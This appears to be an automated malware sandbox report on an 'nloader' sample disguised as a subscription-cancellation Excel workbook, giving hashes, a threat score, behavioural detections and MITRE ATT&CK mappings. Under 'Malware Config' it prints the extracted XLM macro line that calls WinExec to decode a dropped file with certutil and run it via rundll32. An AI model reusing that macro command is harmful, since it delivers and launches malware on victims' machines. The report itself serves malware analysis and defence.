nloader

General

Target

cancel_sub_JPL82173418839376.xlsb
Size

264KB
Sample

210518-7ftfv837rn
MD5

f1b51acf675dd0973ce3ec78fd9a1859
SHA1

83e8858f1d6a849151289a7c507a740d59e5da79
SHA256

7c2dae7cfc7b469c26b14d5cf7aed0e063ab8f854c7563d1e7fca448e6827a05
SHA512

9ce754214b348348fbdbdc933a61c9f01646f8021769c1c683fe1eb7d5af59e22950226233244cd7f304944164b46a55d708a668e01cf115085466357b766b43

Score

10^/10

Malware Config

Extracted

Language

xlm4.0

Source

1
=CALL("Kernel32", "WinExec", "CJ", "cmd.exe /c certutil -decode C:\Users\Public\4802545.xs1 C:\Users\Public\4802545.xs2 && rundll32 C:\Users\Public\4802545.xs2,DF1", 0)

Targets

- Target
  
  cancel_sub_JPL82173418839376.xlsb
- Size
  
  264KB
- MD5
  
  f1b51acf675dd0973ce3ec78fd9a1859
- SHA1
  
  83e8858f1d6a849151289a7c507a740d59e5da79
- SHA256
  
  7c2dae7cfc7b469c26b14d5cf7aed0e063ab8f854c7563d1e7fca448e6827a05
- SHA512
  
  9ce754214b348348fbdbdc933a61c9f01646f8021769c1c683fe1eb7d5af59e22950226233244cd7f304944164b46a55d708a668e01cf115085466357b766b43
Score

10^/10

nloader loader
- Nloader
  Simple loader that includes the keyword 'campo' in the URL used to download other families.
  loader nloader
- Process spawned unexpected child process
  This typically indicates the parent process was compromised via an exploit or macro.
- Nloader Payload
- Blocklisted process makes network request
- Loads dropped DLL
behavioral1 behavioral2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Tasks

Sharing

General

Malware Config

Extracted

Targets

Process spawned unexpected child process

Nloader Payload

Blocklisted process makes network request

Loads dropped DLL

MITRE ATT&CK Enterprise v6

Tasks

static1

behavioral1

behavioral2

We care about your privacy.